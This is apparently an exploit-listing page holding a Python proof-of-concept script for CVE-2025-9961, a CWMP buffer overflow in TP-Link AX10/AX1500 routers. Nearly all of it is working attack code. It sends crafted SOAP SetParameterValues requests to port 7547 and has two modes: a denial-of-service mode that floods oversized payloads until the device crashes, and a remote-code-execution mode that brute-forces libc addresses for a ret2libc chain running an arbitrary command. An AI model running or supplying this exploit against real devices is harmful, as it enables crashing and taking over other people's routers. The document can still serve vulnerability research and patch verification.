4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3

import sys
import argparse
import socket
import struct
import time
from typing import Optional, Tuple, List
from dataclasses import dataclass
from enum import Enum


class ExploitResult(Enum):
    """Outcome categories reported by the request/attack helpers in this file."""

    # Returned by trigger_overflow() when the response text contains "200" or "500";
    # also returned unconditionally by rce_attack().
    SUCCESS = "success"
    # Returned when sending failed with a refused/reset connection, or when a
    # follow-up reachability check fails in dos_attack().
    CRASHED = "crashed"
    # Returned when a response was received but matched none of the checks,
    # or when dos_attack() finishes with the target still reachable.
    FAILED = "failed"
    # Returned when sending failed for any other reason.
    ERROR = "error"


@dataclass
class TargetConfig:
    """Connection settings for the device under test."""

    # Host name or IP address passed to socket.connect().
    host: str
    # TCP port to connect to; defaults to 7547.
    port: int = 7547
    # Socket timeout passed to settimeout() (seconds).
    timeout: int = 10


class TPLinkCWMPExploit:
    """Proof-of-concept client for the CWMP buffer overflow tracked as CVE-2025-9961.

    The class opens plain TCP connections to the configured host/port, sends a
    SOAP ``SetParameterValues`` request wrapped in a hand-built HTTP POST, and
    classifies the outcome as an :class:`ExploitResult`.

    NOTE(review): only run this against equipment you own or are explicitly
    authorized to assess.
    """
    
    # SOAP envelope sent as the HTTP body. The {param_name} and {payload}
    # placeholders are filled in by trigger_overflow().
    SOAP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope 
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
    <SOAP-ENV:Header>
        <cwmp:ID SOAP-ENV:mustUnderstand="1">1</cwmp:ID>
    </SOAP-ENV:Header>
    <SOAP-ENV:Body>
        <cwmp:SetParameterValues>
            <ParameterList SOAP-ENC:arrayType="cwmp:ParameterValueStruct[1]">
                <ParameterValueStruct>
                    <Name>{param_name}</Name>
                    <Value xsi:type="xsd:string">{payload}</Value>
                </ParameterValueStruct>
            </ParameterList>
            <ParameterKey>exploit</ParameterKey>
        </cwmp:SetParameterValues>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

    # Raw HTTP/1.1 request text; {host}, {port}, {length} and {body} are
    # filled in by send_soap_request().
    HTTP_TEMPLATE = """POST /cwmpWeb/inform HTTP/1.1\r
Host: {host}:{port}\r
Content-Type: text/xml; charset=utf-8\r
Content-Length: {length}\r
SOAPAction: ""\r
\r
{body}"""

    # Candidate offsets that rce_attack() adds to each libc base candidate.
    LIBC_SYSTEM_OFFSETS = [
        0x0003ada4,
        0x0003b000,
        0x0003c000,
        0x00040000,
        0x0003a000
    ]
    
    # Candidate libc base addresses iterated by rce_attack().
    LIBC_BASES_MIPS = [
        0x2aaf0000,
        0x2ab00000,
        0x2ab10000,
        0x2ab20000,
        0x2ab30000,
        0x77f00000,
        0x77e00000
    ]

    def __init__(self, config: TargetConfig):
        """Store the connection settings used by every request."""
        self.config = config
    
    def check_alive(self) -> bool:
        """Return True if a TCP connection to the configured host/port succeeds.

        Any exception raised while creating or connecting the socket is
        swallowed and reported as False.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.config.timeout)
            sock.connect((self.config.host, self.config.port))
            sock.close()
            return True
        except Exception:
            return False
    
    def create_overflow_payload(self, command: str, libc_base: int, system_offset: int) -> bytes:
        """Build the byte string used by rce_attack() for one address guess.

        Args:
            command: Text appended (NUL-terminated) at the end of the payload.
            libc_base: Candidate base address.
            system_offset: Offset added to ``libc_base``.

        Returns:
            512 filler bytes, then two packed 32-bit little-endian words, then
            the encoded command followed by a NUL byte.
        """
        padding = b"A" * 512
        
        system_addr = libc_base + system_offset
        
        rop_chain = struct.pack("<I", system_addr)
        rop_chain += struct.pack("<I", 0x41414141)
        rop_chain += command.encode() + b"\x00"
        
        payload = padding + rop_chain
        
        return payload
    
    def create_dos_payload(self, size: int = 1024) -> bytes:
        """Return ``size`` filler bytes (``b"A"`` repeated)."""
        return b"A" * size
    
    def send_soap_request(self, soap_body: str) -> Tuple[bool, str]:
        """Send ``soap_body`` in an HTTP POST and read one response chunk.

        Returns:
            ``(True, response_text)`` when the request was sent; the text is
            empty if the read timed out. ``(False, error_message)`` when any
            other exception occurred.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.config.timeout)
            sock.connect((self.config.host, self.config.port))
            
            http_request = self.HTTP_TEMPLATE.format(
                host=self.config.host,
                port=self.config.port,
                length=len(soap_body),
                body=soap_body
            )
            
            sock.sendall(http_request.encode())
            
            # A read timeout is treated as "no response", not as a failure.
            try:
                response = sock.recv(4096).decode(errors='ignore')
            except socket.timeout:
                response = ""
            
            sock.close()
            return True, response
            
        except Exception as e:
            # NOTE(review): the socket is not closed on this path.
            return False, str(e)
    
    def trigger_overflow(self, payload: bytes) -> ExploitResult:
        """Send one SetParameterValues request carrying ``payload`` and classify the outcome.

        Returns:
            CRASHED if sending failed with a refused/reset connection, ERROR
            for any other send failure, SUCCESS if the response text contains
            "200" or "500", otherwise FAILED.
        """
        soap_body = self.SOAP_TEMPLATE.format(
            param_name="Device.ManagementServer.URL",
            payload=payload.decode(errors='replace')
        )
        
        success, response = self.send_soap_request(soap_body)
        
        if not success:
            # On failure ``response`` holds the exception text.
            if "Connection refused" in response or "reset" in response.lower():
                return ExploitResult.CRASHED
            return ExploitResult.ERROR
        
        if "200" in response or "500" in response:
            return ExploitResult.SUCCESS
        
        return ExploitResult.FAILED
    
    def dos_attack(self, payload_sizes: List[int]) -> ExploitResult:
        """Send filler payloads of each size until the target stops answering.

        Returns:
            CRASHED as soon as a request reports CRASHED or the follow-up
            reachability check fails; FAILED if every size was sent and the
            target is still reachable.
        """
        for size in payload_sizes:
            payload = self.create_dos_payload(size)
            result = self.trigger_overflow(payload)
            
            if result == ExploitResult.CRASHED:
                return ExploitResult.CRASHED
            
            time.sleep(1)
            
            if not self.check_alive():
                return ExploitResult.CRASHED
        
        return ExploitResult.FAILED
    
    def rce_attack(self, command: str) -> ExploitResult:
        """Iterate every base/offset candidate pair, sending one request per pair.

        Returns:
            Always ``ExploitResult.SUCCESS`` once all candidates were tried;
            the return value does not indicate whether ``command`` ran.
        """
        for libc_base in self.LIBC_BASES_MIPS:
            for system_offset in self.LIBC_SYSTEM_OFFSETS:
                payload = self.create_overflow_payload(command, libc_base, system_offset)
                result = self.trigger_overflow(payload)
                
                if result == ExploitResult.CRASHED:
                    # Pause before probing; if still unreachable, move on to
                    # the next candidate without the short delay below.
                    time.sleep(3)
                    if not self.check_alive():
                        continue
                
                time.sleep(0.5)
        
        return ExploitResult.SUCCESS


def parse_arguments() -> argparse.Namespace:
    """Parse the script's command-line options from ``sys.argv``.

    Returns:
        Namespace exposing ``target``, ``port``, ``command``, ``timeout``,
        ``dos`` and ``check_only``.
    """
    cli = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description="CVE-2025-9961: TP-Link AX10/AX1500 CWMP Buffer Overflow",
    )

    # (flags, keyword settings) for each option, registered in this order so
    # the generated help text lists them exactly as declared.
    option_specs = (
        (("target",), {"help": "Target IP address"}),
        (("-p", "--port"), {"type": int, "default": 7547, "help": "CWMP port"}),
        (("-c", "--command"), {"help": "Command to execute (RCE mode)"}),
        (("-t", "--timeout"), {"type": int, "default": 10, "help": "Socket timeout"}),
        (("--dos",), {"action": "store_true", "help": "DoS mode only"}),
        (
            ("--check-only",),
            {"action": "store_true", "help": "Only check if CWMP is open"},
        ),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)

    return cli.parse_args()


def main() -> int:
    """Run the script in the mode selected on the command line.

    Flow: parse arguments, check that the port accepts TCP connections, then
    run check-only, DoS, or command mode depending on the flags.

    Returns:
        Process exit code: 0 for check-only, for a detected crash in DoS mode,
        or after command mode finishes; 1 if the port is unreachable or no
        mode was chosen; 2 if DoS mode ends with the target still reachable.
    """
    args = parse_arguments()
    
    config = TargetConfig(
        host=args.target,
        port=args.port,
        timeout=args.timeout
    )
    
    exploit = TPLinkCWMPExploit(config)
    
    print(f"\n[*] Target: {config.host}:{config.port}")
    print(f"[*] CVE-2025-9961: TP-Link CWMP Buffer Overflow\n")
    
    # Nothing else is attempted unless the port accepts a TCP connection.
    if not exploit.check_alive():
        print("[-] CWMP port is not reachable")
        print("[*] Note: CWMP runs on port 7547 and may need ISP/ACS access")
        return 1
    
    print("[+] CWMP port is open")
    
    if args.check_only:
        print("[*] Check only mode - target has CWMP exposed")
        return 0
    
    # --dos takes precedence over -c when both are given.
    if args.dos:
        print("[*] Running DoS attack...")
        payload_sizes = [512, 1024, 2048, 4096]
        
        for size in payload_sizes:
            print(f"[*] Sending payload size: {size}")
            payload = exploit.create_dos_payload(size)
            # NOTE(review): ``result`` is assigned but never read; the outcome
            # is judged solely by the reachability check below.
            result = exploit.trigger_overflow(payload)
            
            time.sleep(2)
            
            if not exploit.check_alive():
                print(f"\n[!] TARGET CRASHED - DoS successful at size {size}")
                return 0
        
        print("[?] Target may still be alive")
        return 2
    
    if args.command:
        print(f"[*] Attempting RCE with command: {args.command}")
        print("[*] This uses ret2libc with ASLR brute force")
        print("[*] May require multiple attempts...")
        
        # NOTE(review): ``result`` is assigned but never read.
        result = exploit.rce_attack(args.command)
        
        print(f"\n[+] Attack completed - check if command executed")
        return 0
    
    print("[*] No mode specified. Use --dos or -c <command>")
    return 1


if __name__ == "__main__":
    sys.exit(main())